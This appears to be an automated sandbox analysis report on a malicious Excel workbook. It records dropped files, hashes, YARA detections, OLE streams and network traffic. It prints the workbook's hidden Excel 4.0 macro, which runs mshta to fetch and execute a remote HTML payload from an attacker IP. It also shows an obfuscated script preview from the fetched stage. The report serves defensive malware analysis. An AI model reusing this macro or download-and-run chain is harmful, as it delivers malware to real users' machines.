                                    Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';jP645E8Mp8TPT=new Array();oV511BYRuo2ih=new Array();oV511BYRuo2ih[0]='g%78%69%6E\103%38%38\117' ;jP645E8Mp8TPT[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'.%.7.6.%.6.1.\\.1.6

                                    C:\Users\user\AppData\Local\Temp\36E8.tmp

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Cannot read section info
                                    Category:dropped
                                    Size (bytes):1536
                                    Entropy (8bit):1.1464700112623651
                                    Encrypted:false
                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                    Malicious:false
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\~DFEE598E85DD6B8B75.TMP

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):28672
                                    Entropy (8bit):3.4082156922514875
                                    Encrypted:false
                                    SSDEEP:768:XxIk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJZ6ypPn:XxIk3hbdlylKsgqopeJBWhZFGkE+cL2S
                                    MD5:20919860D1102256C795CB59C08178AE
                                    SHA1:E5F6D7A600E9AE82F355A13342C981EBD98517CD
                                    SHA-256:7560DC6FC4A3C43879C4087FE5806DBC6B69B9F144D5A96822020D16A407B7AA
                                    SHA-512:DDC8B8B97D8D56629133F9FEF12C1E033933B06ECEDF815C99DE1FFE78DF15FFBF9073E00FDFA715C95D4201872EE528E54E824745152DA95C5C85CBAEE6F89E
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\~DFF08D13411F7037F4.TMP

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msnu (copy)

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5813271999656315
                                    Encrypted:false
                                    SSDEEP:96:chQCQMqWqvsqvJCwo5z8hQCQMqWqvsEHyqvJCworXzdTYzH6UVMWlUVjA2:cWzo5z8WnHnorXzdPUVMRA2
                                    MD5:9EB84C4053A11C348C20FE0BEBBE23DB
                                    SHA1:898D07BC06C9B6492DC33B6B84194CB24D7F3C6E
                                    SHA-256:E9844BB96479944A1EC583F985D66D3AD8B7470AE060F625EFB6C92B76E9867F
                                    SHA-512:01A40427A7E65AE489DC1832494A6D43C73D7A4C6DAB3B3E572185889DD064878EC8F127C22CEC61E6017589D5C318512B84AE2884B1589DBF27DE25A3C98C6F
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AE0RRM4GV8COLKP8I7YS.temp

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5813271999656315
                                    Encrypted:false
                                    SSDEEP:96:chQCQMqWqvsqvJCwo5z8hQCQMqWqvsEHyqvJCworXzdTYzH6UVMWlUVjA2:cWzo5z8WnHnorXzdPUVMRA2
                                    MD5:9EB84C4053A11C348C20FE0BEBBE23DB
                                    SHA1:898D07BC06C9B6492DC33B6B84194CB24D7F3C6E
                                    SHA-256:E9844BB96479944A1EC583F985D66D3AD8B7470AE060F625EFB6C92B76E9867F
                                    SHA-512:01A40427A7E65AE489DC1832494A6D43C73D7A4C6DAB3B3E572185889DD064878EC8F127C22CEC61E6017589D5C318512B84AE2884B1589DBF27DE25A3C98C6F
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S!...Programs..f.......:...S!.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                    C:\Users\user\Desktop\DOCUMENT_2801.xls

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:33:44 2022, Last Saved Time/Date: Fri Jan 28 07:31:35 2022, Security: 0
                                    Category:dropped
                                    Size (bytes):91648
                                    Entropy (8bit):6.8970131412860605
                                    Encrypted:false
                                    SSDEEP:1536:ZxIk3hbdlylKsgqopeJBWhZFGkE+cL2NdA/6yH5Eb7EdrpFkkGX/sGC6ORQQDBhO:ZSk3hbdlylKsgqopeJBWhZFGkE+cL2NH
                                    MD5:8A307768DFEF529EFD715E73A760B6F6
                                    SHA1:85D4535736310A907B2FF366291B65DB50B3453F
                                    SHA-256:FCE66FFF96A52981013AF7D73751A1A7B46EC5DD007D5390903B60A60B714CF5
                                    SHA-512:BCAFD16F994C49AE1407D0FA4D38049D7300130EDB88E1C0629EC6D3962964265E48AAF4AF9096AB7795F1635B2C0EAE378736BA8843F43634105941749F8554
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, Author: John Lambert @JohnLaTwC
                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, Author: Joe Security
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=....... Xa&8.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1.*.h...6..........C.a.l.i.b.r.i. .L.i.g.h.t.1.

                                    C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy)

                                    Download File
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):557056
                                    Entropy (8bit):7.0041357928485235
                                    Encrypted:false
                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGZUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTnqyDx6BrWt
                                    MD5:900A5B681C016FE03EECB59DBC4855A4
                                    SHA1:A96CD94DF4DD7A76F636866E9C79E995E1175F2A
                                    SHA-256:B77B1E649BFF7CC04B78717A35B00CE24441B09F977098B39E31A716BE5E8CAD
                                    SHA-512:4E0FC66FC0D8672B2A7523329D4A0BC60A664EDEC062C59305DF40CADB890ADE1ED7FAE2C893445C9D199FBCECECC508349D6D3B32DA351EFB7F9A09DE1A24E1
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L......a...........!.....P... ...............`......................................]...............................@-..R...4...........Pv................... ..0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...Pv...........`..............@..@.reloc..v.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:33:44 2022, Last Saved Time/Date: Fri Jan 28 07:31:35 2022, Security: 0
                                    Entropy (8bit):6.862007600534603
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 78.94%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                    File name:DOCUMENT_2801.xls
                                    File size:92340
                                    MD5:3f397d9cca325167d86d575896d40207
                                    SHA1:54b8106c1715eb58230371fa033cbdec1e3aaeff
                                    SHA256:f695adbe8668cdef7b307bc0fc89a664d8002b42dc91b8a01a75aec4cfc9018c
                                    SHA512:ab12fc057dae37f8a39092ee4995a114dca0641041408b09514346e7b474bae4e35d283c7e8e31ca120a88563c6c5e35c6ecd50bd633a4dc7202641158357946
                                    SSDEEP:1536:8xIk3hbdlylKsgqopeJBWhZFGkE+cL2NdA/6yH5Eb7EdrpFkkGX/sGC6ORQQDBh+:8Sk3hbdlylKsgqopeJBWhZFGkE+cL2Nx
                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                    File Icon

                                    Icon Hash:e4eea286a4b4bcb4

                                    Static OLE Info

                                    General

                                    Document Type:OLE
                                    Number of OLE Files:1

                                    OLE File "DOCUMENT_2801.xls"

                                    Indicators
                                    Has Summary Info:True
                                    Application Name:Microsoft Excel
                                    Encrypted Document:False
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:
                                    Flash Objects Count:
                                    Contains VBA Macros:True
                                    Summary
                                    Code Page:1251
                                    Author:xXx
                                    Last Saved By:xXx
                                    Create Time:2022-01-27 23:33:44
                                    Last Saved Time:2022-01-28 07:31:35
                                    Creating Application:Microsoft Excel
                                    Security:0
                                    Document Summary
                                    Document Code Page:1251
                                    Thumbnail Scaling Desired:False
                                    Company:
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:1048576

                                    Streams

                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.319071371437
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . M a c r o 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 aa 00 00 00
                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                    General
                                    Stream Path:\x5SummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.262870751343
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . R . . . . @ . . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 81211
                                    General
                                    Stream Path:Workbook
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:81211
                                    Entropy:7.38151716612
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . X a & 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                    Macro 4.0 Code

                                    Name:Macro3
                                    Type:3
                                    Final:False
                                    Visible:False
                                    Protected:False
                                                      Macro3
                  3
                  False
                  0
                  False
                  post
                  2,2,=EXEC("cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd")5,2,=HALT()
                                    Name:Macro3
                                    Type:3
                                    Final:False
                                    Visible:False
                                    Protected:False
                                                      Macro3
                  3
                  False
                  0
                  False
                  pre
                  2,2,=EXEC("cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd")5,2,=HALT()

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    01/28/22-21:15:07.666041TCP2034631ET TROJAN Maldoc Activity (set)4916680192.168.2.2291.240.118.172

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 28, 2022 21:15:02.989120960 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.047852993 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.048145056 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.049511909 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.108176947 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108724117 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108746052 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108766079 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108783007 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108795881 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108809948 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.108814955 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108833075 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.108834028 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108835936 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.108846903 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108861923 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108865976 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.108875990 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.108875990 CET804916591.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:03.108886003 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.108892918 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.108908892 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:03.117295027 CET4916580192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:07.600526094 CET4916680192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:07.661833048 CET804916691.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:07.663830042 CET4916680192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:07.666040897 CET4916680192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:07.729029894 CET804916691.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:07.729461908 CET804916691.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:07.729482889 CET804916691.240.118.172192.168.2.22
                                    Jan 28, 2022 21:15:07.730539083 CET4916680192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:15:07.806807995 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:07.945823908 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:07.945950031 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:07.946124077 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.085160971 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091576099 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091607094 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091629982 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091651917 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091674089 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091696024 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091717958 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091739893 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091763020 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091785908 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.091909885 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.091936111 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.230431080 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230458975 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230477095 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230495930 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230513096 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.230514050 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230526924 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230545998 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230557919 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.230568886 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230590105 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230607033 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230612040 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.230618000 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.230624914 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230642080 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230657101 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.230659008 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230674982 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230691910 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.230693102 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230710030 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230726004 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.230729103 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230746984 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230760098 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.230765104 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230782032 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.230793953 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.369255066 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369285107 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369302034 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369321108 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369339943 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369357109 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369378090 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369395018 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369395018 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.369411945 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369426966 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.369430065 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369436979 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.369448900 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369467020 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369477034 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.369484901 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369503975 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369522095 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369538069 CET8049167136.0.111.15192.168.2.22
                                    Jan 28, 2022 21:15:08.369546890 CET4916780192.168.2.22136.0.111.15
                                    Jan 28, 2022 21:15:08.369554996 CET8049167136.0.111.15192.168.2.22

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 28, 2022 21:15:07.777925014 CET5216753192.168.2.228.8.8.8
                                    Jan 28, 2022 21:15:07.797043085 CET53521678.8.8.8192.168.2.22

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Jan 28, 2022 21:15:07.777925014 CET192.168.2.228.8.8.80x56d6Standard query (0)tamiladsense.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Jan 28, 2022 21:15:07.797043085 CET8.8.8.8192.168.2.220x56d6No error (0)tamiladsense.com136.0.111.15A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • 91.240.118.172
                                    • tamiladsense.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.224916591.240.118.17280C:\Windows\System32\mshta.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 28, 2022 21:15:03.049511909 CET0OUTGET /ee/ss/se.html HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-US
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 91.240.118.172
                                    Connection: Keep-Alive
                                    Jan 28, 2022 21:15:03.108724117 CET2INHTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Fri, 28 Jan 2022 20:15:03 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
